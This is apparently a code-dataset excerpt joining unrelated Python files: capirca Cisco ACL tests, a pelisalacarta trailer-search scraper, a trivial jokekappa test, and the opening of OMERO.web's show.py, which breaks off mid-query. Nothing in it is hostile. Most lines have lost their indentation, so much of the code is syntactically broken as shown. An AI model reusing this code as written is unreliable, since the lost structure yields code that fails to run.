self.assertIn('permit 6 any 192.168.0.64 0.0.255.31', str(acl))
self.naming.GetNetAddr.assert_called_once_with('SOME_HOST')
def testUdpEstablished(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_9,
self.naming), EXP_INFO)
self.failIf(re.search('permit 17 any any established',
str(acl)), str(acl))
def testIcmpTypes(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_10,
self.naming), EXP_INFO)
# echo-reply = 0
self.failUnless(re.search('permit 1 any any 0',
str(acl)), str(acl))
# unreachable = 3
self.failUnless(re.search('permit 1 any any 3',
str(acl)), str(acl))
# time-exceeded = 11
self.failUnless(re.search('permit 1 any any 11',
str(acl)), str(acl))
def testIpv6IcmpTypes(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_INET6_HEADER + GOOD_TERM_11,
self.naming), EXP_INFO)
# echo-reply = icmp-type code 129
self.failUnless(re.search('permit 58 any any 129',
str(acl)), str(acl))
# destination-unreachable = icmp-type code 1
self.failUnless(re.search('permit 58 any any 1',
str(acl)), str(acl))
# time-exceeded = icmp-type code 3
self.failUnless(re.search('permit 58 any any 3',
str(acl)), str(acl))
@mock.patch.object(cisco.logging, 'debug')
def testIcmpv6InetMismatch(self, mock_debug):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_11,
self.naming), EXP_INFO)
    # output happens in __str__
str(acl)
mock_debug.assert_called_once_with(
'Term good-term-11 will not be rendered,'
' as it has [u\'icmpv6\'] match specified but '
'the ACL is of inet address family.')
@mock.patch.object(cisco.logging, 'debug')
def testIcmpInet6Mismatch(self, mock_debug):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_INET6_HEADER + GOOD_TERM_1,
self.naming), EXP_INFO)
    # output happens in __str__
str(acl)
mock_debug.assert_called_once_with(
'Term good-term-1 will not be rendered,'
' as it has [u\'icmp\'] match specified but '
'the ACL is of inet6 address family.')
def testUnsupportedKeywordsError(self):
pol1 = policy.ParsePolicy(GOOD_HEADER + UNSUPPORTED_TERM_1, self.naming)
pol2 = policy.ParsePolicy(GOOD_HEADER + UNSUPPORTED_TERM_1, self.naming)
# protocol-except
self.assertRaises(aclgenerator.UnsupportedFilterError,
cisco.Cisco, pol1, EXP_INFO)
# source-prefix
self.assertRaises(aclgenerator.UnsupportedFilterError,
cisco.Cisco, pol2, EXP_INFO)
def testDefaultInet6Protocol(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_INET6_HEADER + GOOD_TERM_12,
self.naming), EXP_INFO)
self.failUnless(re.search('permit ipv6 any any', str(acl)), str(acl))
@mock.patch.object(cisco.logging, 'warn')
def testExpiredTerm(self, mock_warn):
_ = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + EXPIRED_TERM,
self.naming), EXP_INFO)
mock_warn.assert_called_once_with(
'WARNING: Term %s in policy %s is expired and will not '
'be rendered.', 'is_expired', 'test-filter')
@mock.patch.object(cisco.logging, 'info')
def testExpiringTerm(self, mock_info):
exp_date = datetime.date.today() + datetime.timedelta(weeks=EXP_INFO)
_ = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + EXPIRING_TERM %
exp_date.strftime('%Y-%m-%d'),
self.naming), EXP_INFO)
mock_info.assert_called_once_with(
'INFO: Term %s in policy %s expires in '
'less than two weeks.', 'is_expiring', 'test-filter')
def testTermHopByHop(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_15,
self.naming), EXP_INFO)
self.failUnless('permit hbh any any' in str(acl), str(acl))
def testOwnerTerm(self):
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER +
GOOD_TERM_13, self.naming), EXP_INFO)
self.failUnless(re.search(' remark Owner: foo@google.com',
str(acl)), str(acl))
def testRemoveTrailingCommentWhitespace(self):
    term = LONG_COMMENT_TERM % ('a' * 99)
acl = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + term,
self.naming), EXP_INFO)
def testBuildTokens(self):
pol1 = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_5,
self.naming), EXP_INFO)
st, sst = pol1._BuildTokens()
self.assertEquals(st, SUPPORTED_TOKENS)
self.assertEquals(sst, SUPPORTED_SUB_TOKENS)
def testBuildWarningTokens(self):
pol1 = cisco.Cisco(policy.ParsePolicy(GOOD_HEADER + GOOD_TERM_17,
self.naming), EXP_INFO)
st, sst = pol1._BuildTokens()
self.assertEquals(st, SUPPORTED_TOKENS)
self.assertEquals(sst, SUPPORTED_SUB_TOKENS)
if __name__ == '__main__':
unittest.main()
|
ryantierney513/capirca
|
tests/lib/cisco_test.py
|
Python
|
apache-2.0
| 23,978 | 0.001877 |
# -*- coding: utf-8 -*-
# ------------------------------------------------------------
# pelisalacarta 4
# Copyright 2015 tvalacarta@gmail.com
# http://blog.tvalacarta.info/plugin-xbmc/pelisalacarta/
#
# Distributed under the terms of GNU General Public License v3 (GPLv3)
# http://www.gnu.org/licenses/gpl-3.0.html
# ------------------------------------------------------------
# This file is part of pelisalacarta 4.
#
# pelisalacarta 4 is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# pelisalacarta 4 is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with pelisalacarta 4. If not, see <http://www.gnu.org/licenses/>.
# --------------------------------------------------------------------------------
# Search trailers from youtube, filmaffinity, abandomoviez, vimeo, etc...
# --------------------------------------------------------------------------------
import re
import urllib
import urlparse
from core import config
from core import jsontools
from core import logger
from core import scrapertools
from core import servertools
from core.item import Item
from platformcode import platformtools
result = None
window_select = []
# Whether or not to enable the manual search option
if config.get_platform() != "plex":
keyboard = True
else:
keyboard = False
def buscartrailer(item, trailers=[]):
logger.info()
    # List of actions when run from the context menu
if item.action == "manual_search" and item.contextual:
itemlist = manual_search(item)
item.contentTitle = itemlist[0].contentTitle
elif 'search' in item.action and item.contextual:
itemlist = globals()[item.action](item)
else:
        # Remove the Search Trailer option from the context menu to avoid redundancy
if type(item.context) is str and "buscar_trailer" in item.context:
item.context = item.context.replace("buscar_trailer", "")
elif type(item.context) is list and "buscar_trailer" in item.context:
item.context.remove("buscar_trailer")
item.text_color = ""
itemlist = []
if item.contentTitle != "":
item.contentTitle = item.contentTitle.strip()
elif keyboard:
fulltitle = re.sub('\[\/*(B|I|COLOR)\s*[^\]]*\]', '', item.fulltitle.strip())
item.contentTitle = platformtools.dialog_input(default=fulltitle, heading="Introduce el título a buscar")
if item.contentTitle is None:
item.contentTitle = fulltitle
else:
item.contentTitle = item.contentTitle.strip()
else:
fulltitle = re.sub('\[\/*(B|I|COLOR)\s*[^\]]*\]', '', item.fulltitle.strip())
item.contentTitle = fulltitle
item.year = item.infoLabels['year']
logger.info("Búsqueda: %s" % item.contentTitle)
logger.info("Año: %s" % item.year)
if item.infoLabels['trailer'] and not trailers:
url = item.infoLabels['trailer']
if "youtube" in url:
url = url.replace("embed/", "watch?v=")
titulo, url, server = servertools.findvideos(url)[0]
title = "Trailer por defecto [" + server + "]"
itemlist.append(item.clone(title=title, url=url, server=server, action="play"))
if item.show or item.infoLabels['tvshowtitle'] or item.contentType != "movie":
tipo = "tv"
else:
tipo = "movie"
try:
if not trailers:
itemlist.extend(tmdb_trailers(item, tipo))
else:
for trailer in trailers:
title = trailer['name'] + " [" + trailer['size'] + "p] (" + trailer['language'].replace("en", "ING")\
.replace("es", "ESP")+") [tmdb/youtube]"
itemlist.append(item.clone(action="play", title=title, url=trailer['url'], server="youtube"))
except:
import traceback
logger.error(traceback.format_exc())
if item.contextual:
title = "[COLOR green]%s[/COLOR]"
else:
title = "%s"
itemlist.append(item.clone(title=title % "Búsqueda en Youtube", action="youtube_search",
text_color="green"))
itemlist.append(item.clone(title=title % "Búsqueda en Filmaffinity",
action="filmaffinity_search", text_color="green"))
    # If it is a TV show, the Abandomoviez search option is not included
if not item.show and not item.infoLabels['tvshowtitle']:
itemlist.append(item.clone(title=title % "Búsqueda en Abandomoviez",
action="abandomoviez_search", text_color="green"))
itemlist.append(item.clone(title=title % "Búsqueda en Jayhap (Youtube, Vimeo & Dailymotion)",
action="jayhap_search", text_color="green"))
if item.contextual:
global window_select, result
select = Select("DialogSelect.xml", config.get_runtime_path(), item=item, itemlist=itemlist, caption="Buscando: "+item.contentTitle)
window_select.append(select)
select.doModal()
if item.windowed:
return result, window_select
else:
return itemlist
def manual_search(item):
logger.info()
texto = platformtools.dialog_input(default=item.contentTitle, heading=config.get_localized_string(30112))
if texto is not None:
if item.extra == "abandomoviez":
return abandomoviez_search(item.clone(contentTitle=texto, page="", year=""))
elif item.extra == "youtube":
return youtube_search(item.clone(contentTitle=texto, page=""))
elif item.extra == "filmaffinity":
return filmaffinity_search(item.clone(contentTitle=texto, page="", year=""))
elif item.extra == "jayhap":
return jayhap_search(item.clone(contentTitle=texto))
def tmdb_trailers(item, tipo="movie"):
logger.info()
from core.tmdb import Tmdb
itemlist = []
tmdb_search = None
if item.infoLabels['tmdb_id']:
tmdb_search = Tmdb(id_Tmdb=item.infoLabels['tmdb_id'], tipo=tipo, idioma_busqueda='es')
elif item.infoLabels['year']:
tmdb_search = Tmdb(texto_buscado=item.contentTitle, tipo=tipo, year=item.infoLabels['year'])
if tmdb_search:
for result in tmdb_search.get_videos():
title = result['name'] + " [" + result['size'] + "p] (" + result['language'].replace("en", "ING")\
.replace("es", "ESP")+") [tmdb/youtube]"
itemlist.append(item.clone(action="play", title=title, url=result['url'], server="youtube"))
return itemlist
def youtube_search(item):
logger.info()
itemlist = []
titulo = item.contentTitle
if item.extra != "youtube":
titulo += " trailer"
    # Check whether this is a fresh search or comes from the Next option
if item.page != "":
data = scrapertools.downloadpage(item.page)
else:
titulo = urllib.quote(titulo)
titulo = titulo.replace("%20", "+")
data = scrapertools.downloadpage("https://www.youtube.com/results?sp=EgIQAQ%253D%253D&q="+titulo)
data = re.sub(r"\n|\r|\t|\s{2}| ", "", data)
patron = '<span class="yt-thumb-simple">.*?(?:src="https://i.ytimg.com/|data-thumb="https://i.ytimg.com/)([^"]+)"' \
'.*?<h3 class="yt-lockup-title ">.*?<a href="([^"]+)".*?title="([^"]+)".*?' \
'</a><span class="accessible-description".*?>.*?(\d+:\d+)'
matches = scrapertools.find_multiple_matches(data, patron)
for scrapedthumbnail, scrapedurl, scrapedtitle, scrapedduration in matches:
scrapedthumbnail = urlparse.urljoin("https://i.ytimg.com/", scrapedthumbnail)
scrapedtitle = scrapedtitle.decode("utf-8")
scrapedtitle = scrapedtitle + " (" + scrapedduration + ")"
if item.contextual:
scrapedtitle = "[COLOR white]%s[/COLOR]" % scrapedtitle
url = urlparse.urljoin('https://www.youtube.com/', scrapedurl)
itemlist.append(item.clone(title=scrapedtitle, action="play", server="youtube", url=url,
thumbnail=scrapedthumbnail, text_color="white"))
next_page = scrapertools.find_single_match(data, '<a href="([^"]+)"[^>]+><span class="yt-uix-button-content">'
'Siguiente')
if next_page != "":
next_page = urlparse.urljoin("https://www.youtube.com", next_page)
itemlist.append(item.clone(title=">> Siguiente", action="youtube_search", extra="youtube", page=next_page,
thumbnail="", text_color=""))
if not itemlist:
itemlist.append(item.clone(title="La búsqueda no ha dado resultados (%s)" % titulo,
action="", thumbnail="", text_color=""))
if keyboard:
if item.contextual:
title = "[COLOR green]%s[/COLOR]"
else:
title = "%s"
itemlist.append(item.clone(title=title % "Búsqueda Manual en Youtube", action="manual_search",
text_color="green", thumbnail="", extra="youtube"))
return itemlist
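# Illustrative helper (an example only, not used by the channel code): builds
# the same Youtube search URL as youtube_search above for a given title.
def _example_youtube_search_url(titulo="Blade Runner 2049 trailer"):
    titulo = urllib.quote(titulo).replace("%20", "+")
    return "https://www.youtube.com/results?sp=EgIQAQ%253D%253D&q=" + titulo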
def abandomoviez_search(item):
logger.info()
    # Check whether this is a fresh search or comes from the Next option
if item.page != "":
data = scrapertools.downloadpage(item.page)
else:
titulo = item.contentTitle.decode('utf-8').encode('iso-8859-1')
post = urllib.urlencode({'query': titulo, 'searchby': '1', 'posicion': '1', 'orden': '1',
'anioin': item.year, 'anioout': item.year, 'orderby': '1'})
url = "http://www.abandomoviez.net/db/busca_titulo_advance.php"
item.prefix = "db/"
data = scrapertools.downloadpage(url, post=post)
if "No hemos encontrado ninguna" in data:
url = "http://www.abandomoviez.net/indie/busca_titulo_advance.php"
item.prefix = "indie/"
data = scrapertools.downloadpage(url, post=post).decode("iso-8859-1").encode('utf-8')
itemlist = []
patron = '(?:<td width="85"|<div class="col-md-2 col-sm-2 col-xs-3">).*?<img src="([^"]+)"' \
'.*?href="([^"]+)">(.*?)(?:<\/td>|<\/small>)'
matches = scrapertools.find_multiple_matches(data, patron)
    # If there is only one result, search its trailers directly; otherwise list all results
if len(matches) == 1:
item.url = urlparse.urljoin("http://www.abandomoviez.net/%s" % item.prefix, matches[0][1])
item.thumbnail = matches[0][0]
itemlist = search_links_abando(item)
elif len(matches) > 1:
for scrapedthumbnail, scrapedurl, scrapedtitle in matches:
scrapedurl = urlparse.urljoin("http://www.abandomoviez.net/%s" % item.prefix, scrapedurl)
scrapedtitle = scrapertools.htmlclean(scrapedtitle)
itemlist.append(item.clone(title=scrapedtitle, action="search_links_abando",
url=scrapedurl, thumbnail=scrapedthumbnail, text_color="white"))
next_page = scrapertools.find_single_match(data, '<a href="([^"]+)">Siguiente')
if next_page != "":
next_page = urlparse.urljoin("http://www.abandomoviez.net/%s" % item.prefix, next_page)
itemlist.append(item.clone(title=">> Siguiente", action="abandomoviez_search", page=next_page, thumbnail="",
text_color=""))
if not itemlist:
itemlist.append(item.clone(title="La búsqueda no ha dado resultados", action="", thumbnail="",
text_color=""))
if keyboard:
if item.contextual:
title = "[COLOR green]%s[/COLOR]"
else:
title = "%s"
itemlist.append(item.clone(title=title % "Búsqueda Manual en Abandomoviez",
action="manual_search", thumbnail="", text_color="green", extra="abandomoviez"))
return itemlist
def search_links_abando(item):
logger.info()
data = scrapertools.downloadpage(item.url)
itemlist = []
if "Lo sentimos, no tenemos trailer" in data:
itemlist.append(item.clone(title="No hay ningún vídeo disponible", action="", text_color=""))
else:
if item.contextual:
progreso = platformtools.dialog_progress("Buscando en abandomoviez", "Cargando trailers...")
progreso.update(10)
i = 0
message = "Cargando trailers..."
patron = '<div class="col-md-3 col-xs-6"><a href="([^"]+)".*?' \
'Images/(\d+).gif.*?</div><small>(.*?)</small>'
matches = scrapertools.find_multiple_matches(data, patron)
if len(matches) == 0:
trailer_url = scrapertools.find_single_match(data, '<iframe.*?src="([^"]+)"')
if trailer_url != "":
trailer_url = trailer_url.replace("embed/", "watch?v=")
code = scrapertools.find_single_match(trailer_url, 'v=([A-z0-9\-_]+)')
thumbnail = "https://img.youtube.com/vi/%s/0.jpg" % code
itemlist.append(item.clone(title="Trailer [youtube]", url=trailer_url, server="youtube",
thumbnail=thumbnail, action="play", text_color="white"))
else:
for scrapedurl, language, scrapedtitle in matches:
if language == "1":
idioma = " (ESP)"
else:
idioma = " (V.O)"
scrapedurl = urlparse.urljoin("http://www.abandomoviez.net/%s" % item.prefix, scrapedurl)
scrapedtitle = scrapertools.htmlclean(scrapedtitle) + idioma + " [youtube]"
if item.contextual:
i += 1
message += ".."
progreso.update(10 + (90*i/len(matches)), message)
scrapedtitle = "[COLOR white]%s[/COLOR]" % scrapedtitle
data_trailer = scrapertools.downloadpage(scrapedurl)
trailer_url = scrapertools.find_single_match(data_trailer, 'iframe.*?src="([^"]+)"')
trailer_url = trailer_url.replace("embed/", "watch?v=")
code = scrapertools.find_single_match(trailer_url, 'v=([A-z0-9\-_]+)')
thumbnail = "https://img.youtube.com/vi/%s/0.jpg" % code
itemlist.append(item.clone(title=scrapedtitle, url=trailer_url, server="youtube", action="play",
thumbnail=thumbnail, text_color="white"))
if item.contextual:
progreso.close()
if keyboard:
if item.contextual:
title = "[COLOR green]%s[/COLOR]"
else:
title = "%s"
itemlist.append(item.clone(title=title % "Búsqueda Manual en Abandomoviez",
action="manual_search", thumbnail="", text_color="green", extra="abandomoviez"))
return itemlist
def filmaffinity_search(item):
logger.info()
if item.filmaffinity:
item.url = item.filmaffinity
return search_links_filmaff(item)
    # Check whether this is a fresh search or comes from the Next option
if item.page != "":
data = scrapertools.downloadpage(item.page)
else:
params = urllib.urlencode([('stext', item.contentTitle), ('stype%5B%5D', 'title'), ('country', ''),
('genre', ''), ('fromyear', item.year), ('toyear', item.year)])
url = "http://www.filmaffinity.com/es/advsearch.php?%s" % params
data = scrapertools.downloadpage(url)
itemlist = []
patron = '<div class="mc-poster">.*?<img.*?src="([^"]+)".*?' \
'<div class="mc-title"><a href="/es/film(\d+).html"[^>]+>(.*?)<img'
matches = scrapertools.find_multiple_matches(data, patron)
    # If there is only one result, search its trailers directly; otherwise list all results
if len(matches) == 1:
item.url = "http://www.filmaffinity.com/es/evideos.php?movie_id=%s" % matches[0][1]
item.thumbnail = matches[0][0]
if not item.thumbnail.startswith("http"):
item.thumbnail = "http://www.filmaffinity.com" + item.thumbnail
itemlist = search_links_filmaff(item)
elif len(matches) > 1:
for scrapedthumbnail, id, scrapedtitle in matches:
if not scrapedthumbnail.startswith("http"):
scrapedthumbnail = "http://www.filmaffinity.com" + scrapedthumbnail
scrapedurl = "http://www.filmaffinity.com/es/evideos.php?movie_id=%s" % id
scrapedtitle = unicode(scrapedtitle, encoding="utf-8", errors="ignore")
scrapedtitle = scrapertools.htmlclean(scrapedtitle)
itemlist.append(item.clone(title=scrapedtitle, url=scrapedurl, text_color="white",
action="search_links_filmaff", thumbnail=scrapedthumbnail))
next_page = scrapertools.find_single_match(data, '<a href="([^"]+)">>></a>')
if next_page != "":
next_page = urlparse.urljoin("http://www.filmaffinity.com/es/", next_page)
itemlist.append(item.clone(title=">> Siguiente", page=next_page, action="filmaffinity_search", thumbnail="",
text_color=""))
if not itemlist:
itemlist.append(item.clone(title="La búsqueda no ha dado resultados (%s)" % item.contentTitle,
action="", thumbnail="", text_color=""))
if keyboard:
if item.contextual:
title = "[COLOR green]%s[/COLOR]"
else:
title = "%s"
itemlist.append(item.clone(title=title % "Búsqueda Manual en Filmaffinity",
action="manual_search", text_color="green", thumbnail="", extra="filmaffinity"))
return itemlist
def search_links_filmaff(item):
logger.info()
itemlist = []
data = scrapertools.downloadpage(item.url)
if not '<a class="lnkvvid"' in data:
itemlist.append(item.clone(title="No hay ningún vídeo disponible", action="", text_color=""))
else:
patron = '<a class="lnkvvid".*?<b>(.*?)</b>.*?iframe.*?src="([^"]+)"'
matches = scrapertools.find_multiple_matches(data, patron)
for scrapedtitle, scrapedurl in matches:
if not scrapedurl.startswith("http:"):
scrapedurl = urlparse.urljoin("http:", scrapedurl)
trailer_url = scrapedurl.replace("-nocookie.com/embed/", ".com/watch?v=")
if "youtube" in trailer_url:
server = "youtube"
                code = scrapertools.find_single_match(trailer_url, 'v=([A-Za-z0-9\-_]+)')
thumbnail = "https://img.youtube.com/vi/%s/0.jpg" % code
else:
server = ""
thumbnail = item.thumbnail
scrapedtitle = unicode(scrapedtitle, encoding="utf-8", errors="ignore")
scrapedtitle = scrapertools.htmlclean(scrapedtitle)
scrapedtitle += " [" + server + "]"
if item.contextual:
scrapedtitle = "[COLOR white]%s[/COLOR]" % scrapedtitle
itemlist.append(item.clone(title=scrapedtitle, url=trailer_url, server=server, action="play",
thumbnail=thumbnail, text_color="white"))
itemlist = servertools.get_servers_itemlist(itemlist)
if keyboard:
if item.contextual:
title = "[COLOR green]%s[/COLOR]"
else:
title = "%s"
itemlist.append(item.clone(title=title % "Búsqueda Manual en Filmaffinity",
action="manual_search", thumbnail="", text_color="green", extra="filmaffinity"))
return itemlist
def jayhap_search(item):
logger.info()
itemlist = []
if item.extra != "jayhap":
item.contentTitle += " trailer"
texto = item.contentTitle
post = urllib.urlencode({'q': texto, 'yt': 'true', 'vm': 'true', 'dm': 'true',
'v': 'all', 'l': 'all', 'd': 'all'})
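    # Illustrative sketch (added comment, not part of the original code): the encoded
    # body sent to Jayhap looks roughly like
    #     q=Inception+trailer&yt=true&vm=true&dm=true&v=all&l=all&d=all
    # where the "q" value is whatever the user searched for (example value only).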
    # Check whether this is a search from scratch or it comes from the "Next" option
if item.page != "":
        post += "&" + urllib.urlencode(item.page)
data = scrapertools.downloadpage("https://www.jayhap.com/load_more.php", post=post)
else:
data = scrapertools.downloadpage("https://www.jayhap.com/get_results.php", post=post)
data = jsontools.load_json(data)
for video in data['videos']:
url = video['url']
server = video['source'].lower()
duration = " (" + video['duration'] + ")"
title = video['title'].decode("utf-8") + duration + " [" + server.capitalize() + "]"
thumbnail = video['thumbnail']
if item.contextual:
title = "[COLOR white]%s[/COLOR]" % title
itemlist.append(item.clone(action="play", server=server, title=title, url=url, thumbnail=thumbnail,
text_color="white"))
if not itemlist:
itemlist.append(item.clone(title="La búsqueda no ha dado resultados (%s)" % item.contentTitle,
action="", thumbnail="", text_color=""))
else:
tokens = data['tokens']
tokens['yt_token'] = tokens.pop('youtube')
tokens['vm_token'] = tokens.pop('vimeo')
tokens['dm_token'] = tokens.pop('dailymotion')
itemlist.append(item.clone(title=">> Siguiente", page=tokens, action="jayhap_search", extra="jayhap",
thumbnail="", text_color=""))
if keyboard:
if item.contextual:
title = "[COLOR green]%s[/COLOR]"
else:
title = "%s"
itemlist.append(item.clone(title=title % "Búsqueda Manual en Jayhap", action="manual_search",
text_color="green", thumbnail="", extra="jayhap"))
return itemlist
try:
import xbmcgui
import xbmc
class Select(xbmcgui.WindowXMLDialog):
def __init__(self, *args, **kwargs):
self.item = kwargs.get('item')
self.itemlist = kwargs.get('itemlist')
self.caption = kwargs.get('caption')
self.result = None
def onInit(self):
try:
self.control_list = self.getControl(6)
self.getControl(5).setNavigation(self.control_list, self.control_list, self.control_list, self.control_list)
self.getControl(3).setEnabled(0)
self.getControl(3).setVisible(0)
except:
pass
try:
self.getControl(99).setVisible(False)
except:
pass
self.getControl(1).setLabel("[COLOR orange]"+self.caption+"[/COLOR]")
self.getControl(5).setLabel("[COLOR tomato][B]Cerrar[/B][/COLOR]")
self.items = []
for item in self.itemlist:
item_l = xbmcgui.ListItem(item.title)
item_l.setArt({'thumb': item.thumbnail})
item_l.setProperty('item_copy', item.tourl())
self.items.append(item_l)
self.control_list.reset()
self.control_list.addItems(self.items)
self.setFocus(self.control_list)
def onClick(self, id):
            # "Cancel" button and [X] button
if id == 5:
global window_select, result
self.result = "_no_video"
result = "no_video"
self.close()
window_select.pop()
if not window_select:
if not self.item.windowed:
del window_select
else:
window_select[-1].doModal()
def onAction(self,action):
global window_select, result
if action == 92 or action == 110:
self.result = "no_video"
result = "no_video"
self.close()
window_select.pop()
if not window_select:
if not self.item.windowed:
del window_select
else:
window_select[-1].doModal()
try:
if (action == 7 or action == 100) and self.getFocusId() == 6:
selectitem = self.control_list.getSelectedItem()
item = Item().fromurl(selectitem.getProperty("item_copy"))
if item.action == "play" and self.item.windowed:
video_urls, puede, motivo = servertools.resolve_video_urls_for_playing(item.server, item.url)
self.close()
xbmc.sleep(200)
if puede:
result = video_urls[-1][1]
self.result = video_urls[-1][1]
else:
result = None
self.result = None
elif item.action == "play" and not self.item.windowed:
for window in window_select:
window.close()
retorna = platformtools.play_video(item)
if not retorna:
while True:
xbmc.sleep(1000)
if not xbmc.Player().isPlaying():
break
window_select[-1].doModal()
else:
self.close()
buscartrailer(item)
except:
import traceback
logger.error(traceback.format_exc())
except:
pass
|
neno1978/pelisalacarta
|
python/main-classic/channels/trailertools.py
|
Python
|
gpl-3.0
| 26,400 | 0.005538 |
# coding: utf-8
import unittest
import jokekappa
class VoidTest(unittest.TestCase):
def test_void(self):
pass
|
CodeTengu/jokekappa
|
tests/test_core.py
|
Python
|
mit
| 127 | 0 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (c) 2014 University of Dundee & Open Microscopy Environment.
# All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
"""
Generic functionality for handling particular links and "showing" objects
in the OMERO.web tree view.
"""
import omero
import re
from omero.rtypes import rint, rlong
from django.core.urlresolvers import reverse
from copy import deepcopy
from django.conf import settings
class IncorrectMenuError(Exception):
"""Exception to signal that we are on the wrong menu."""
def __init__(self, uri):
"""
Constructs a new Exception instance.
@param uri URI to redirect to.
@type uri String
"""
super(Exception, self).__init__()
self.uri = uri
class Show(object):
"""
This object is used by most of the top-level pages. The "show" and
"path" query strings are used by this object to both direct OMERO.web to
the correct locations in the hierarchy and select the correct objects
in that hierarchy.
"""
# List of prefixes that are at the top level of the tree
TOP_LEVEL_PREFIXES = ('project', 'screen', 'tagset')
# List of supported object types
SUPPORTED_OBJECT_TYPES = (
'project', 'dataset', 'image', 'screen', 'plate', 'tag',
'acquisition', 'run', 'well', 'tagset'
)
# Regular expression which declares the format for a "path" used either
# in the "path" or "show" query string. No modifications should be made
# to this regex without corresponding unit tests in
# "tests/unit/test_show.py".
PATH_REGEX = re.compile(
r'(?P<object_type>\w+)\.?(?P<key>\w+)?[-=](?P<value>[^\|]*)\|?'
)
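    # Illustrative note (added for clarity; the IDs are hypothetical): for a
    # query string such as show=project.id-51|image-3, iterating with
    # PATH_REGEX.finditer() yields object_type/key/value groups of
    # ('project', 'id', '51') and ('image', None, '3').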
# Regular expression for matching Well names
WELL_REGEX = re.compile(
'^(?:(?P<alpha_row>[a-zA-Z]+)(?P<digit_column>\d+))|'
'(?:(?P<digit_row>\d+)(?P<alpha_column>[a-zA-Z]+))$'
)
def __init__(self, conn, request, menu):
"""
Constructs a Show instance. The instance will not be fully
initialised until the first retrieval of the L{Show.first_selected}
property.
@param conn OMERO gateway.
@type conn L{omero.gateway.BlitzGateway}
@param request Django HTTP request.
@type request L{django.http.HttpRequest}
@param menu Literal representing the current menu we are on.
@type menu String
"""
# The list of "paths" ("type-id") we have been requested to
# show/select in the user interface. May be modified if one or
# more of the elements is not in the tree. This is currently the
# case for all Screen-Plate-Well hierarchy elements below Plate
# (Well for example).
self._initially_select = list()
# The nodes of the tree that will be initially open based on the
# nodes that are initially selected.
self._initially_open = list()
# The owner of the node closest to the root of the tree from the
# list of initially open nodes.
self._initially_open_owner = None
# First selected node from the requested initially open "paths"
# that is first loaded on first retrieval of the "first_selected"
# property.
self._first_selected = None
self.conn = conn
self.request = request
self.menu = menu
path = self.request.GET.get('path', '').split('|')[-1]
self._add_if_supported(path)
show = self.request.GET.get('show', '')
for path in show.split('|'):
self._add_if_supported(path)
def _add_if_supported(self, path):
"""Adds a path to the initially selected list if it is supported."""
m = self.PATH_REGEX.match(path)
if m is None:
return
object_type = m.group('object_type')
key = m.group('key')
value = m.group('value')
if key is None:
key = 'id'
if object_type in self.SUPPORTED_OBJECT_TYPES:
# 'run' is an alternative for 'acquisition'
object_type = object_type.replace('run', 'acquisition')
self._initially_select.append(
'%s.%s-%s' % (object_type, key, value)
)
def _load_tag(self, attributes):
"""
Loads a Tag based on a certain set of attributes from the server.
@param attributes Set of attributes to filter on.
@type attributes L{dict}
"""
# Tags have an "Annotation" suffix added to the object name so
# need to be loaded differently.
return next(self.conn.getObjects(
"TagAnnotation", attributes=attributes
))
def get_well_row_column(self, well):
"""
Retrieves a tuple of row and column as L{int} for a given Well name
("A1" or "1A") string.
@param well Well name string to retrieve the row and column tuple for.
@type well L{str}
"""
m = self.WELL_REGEX.match(well)
if m is None:
return None
# We are using an algorithm that expects alpha columns and digit
# rows (like a spreadsheet). is_reversed will be True if those
# conditions are not met, signifying that the row and column
        # calculated need to be reversed before returning.
is_reversed = False
if m.group('alpha_row') is not None:
a = m.group('alpha_row').upper()
b = m.group('digit_column')
is_reversed = True
else:
a = m.group('alpha_column').upper()
b = m.group('digit_row')
# Convert base26 column string to number. Adapted from XlsxWriter:
# * https://github.com/jmcnamara/XlsxWriter
# * xlsxwriter/utility.py
n = 0
column = 0
for character in reversed(a):
column += (ord(character) - ord('A') + 1) * (26 ** n)
n += 1
# Convert 1-index to zero-index
row = int(b) - 1
column -= 1
if is_reversed:
return column, row
return row, column
def _load_well(self, attributes):
"""
Loads a Well based on a certain set of attributes from the server.
@param attributes Set of attributes to filter on.
@type attributes L{dict}
"""
if 'id' in attributes:
return self.conn.getObject('Well', attributes=attributes)
if 'name' in attributes:
row, column = self.get_well_row_column(attributes['name'])
path = self.request.GET.get('path', '')
for m in self.PATH_REGEX.finditer(path):
object_type = m.group('object_type')
# May have 'run' here rather than 'acquisition' because
# the path will not have been validated and replaced.
if object_type not in ('plate', 'run', 'acquisition'):
continue
# 'run' is an alternative for 'acquisition'
object_type = object_type.replace('run', 'acquisition')
# Try and load the potential parent first
key = m.group('key')
value = m.group('value')
if key is None:
key = 'id'
if key == 'id':
value = long(value)
parent_attributes = {key: value}
parent, = self.conn.getObjects(
object_type, attributes=parent_attributes
)
# Now use the parent to try and locate the Well
query_service = self.conn.getQueryService()
params = omero.sys.ParametersI()
params.map['row'] = rint(row)
params.map['column'] = rint(column)
params.addId(parent.id)
if object_type == 'plate':
db_row, = query_service.projection(
'select w.id from Well as w '
'where w.row = :row and w.column = :column '
